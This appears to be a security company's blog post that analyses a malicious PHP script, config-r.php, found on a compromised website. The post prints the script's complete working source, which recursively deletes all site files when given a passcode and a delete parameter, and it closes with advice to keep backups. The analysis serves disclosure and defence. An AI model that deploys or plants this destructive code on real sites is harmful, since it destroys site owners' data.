Sucuri Blog

Website Security News

Labs Note

PHP Script Nukes All Website Files

Most malware and spam that we come across has some sort of discernable purpose to it, usually something which benefits the attackers financially. This is often related to spam campaigns, credit card theft, spreading trojans/spyware or phishing scams. However, every so often we find something that defies this trend and is just downright evil. We found a PHP script named config-r.php in the root directory of a website that contained the following code:

<?php
//$dir = getcwd();
if ($_GET['id'] == 'red@<redacted>@delete') {
    $dir   = getcwd();
    $files = scandir($dir);
    if (@$_GET['doAction'] == 'delete') {
        rrmdir($dir);
    } else {
        echo '<br /><br /><a href="config-r.php?id=red@<redacted>@delete&doAction=delete">Yes, Delete AllFiles/Folders</a>';
    }
    echo "<br /><br />";
    echo "<pre>";
    print_r($files);
    echo "</pre>";
}
function rrmdir($dir1)
{
    if (is_dir($dir1)) {
        $objects = scandir($dir1);
        foreach ($objects as $object) {
            if ($object != "." && $object != "..") {
                if (filetype($dir1 . "/" . $object) == "dir") {
                    if ($object != 'config-r.php') {
                        rrmdir($dir1 . "/" . $object);
                    }
                } else {
                    if ($object != 'config-r.php') {
                        unlink($dir1 . "/" . $object);
                    }
                }
            }
        }
        reset($objects);
        @rmdir($dir1);
        echo '<br />Deleted All Files/Folders!<br />';
    }
}

This section of the code waits for the attacker to send a request to the php script:

if(@$_GET['doAction']=='delete')

Simply accessing this file in a web browser with doAction=delete added onto the URL and some sort of a pass code in the id parameter will recursively remove all website files and directories, effectively deleting the entire website file structure and contents. Interestingly, it does not remove the malicious php itself (config-r.php) and will remain on the server even after the big red button is pushed, so to speak.

Fortunately, the website on which we found this script was intact and the attackers had not yet nuked it into oblivion. My best guess is that whoever coded this either had an axe to grind against a particular website or just wanted to reap wanton destruction for the lulz.

If you don\’t want to leave your site existence at mercy of not so noble people, make sure you regularly back up your site and don\’t neglect website security.

About Ben Martin

Ben Martin is Sucuri’s Security Analyst who joined the company in 2013. Ben's main responsibilities include finding new undetected malware, identifying trends in the website security world, and, of course, cleaning websites. His professional experience covers more than six years of working with infected websites, writing blog posts, and taking escalated tickets. When Ben isn't slaying malware, you might find him editing audio, producing music, playing video games, or cuddling with his cat. Connect with him on Twitter

Reader Interactions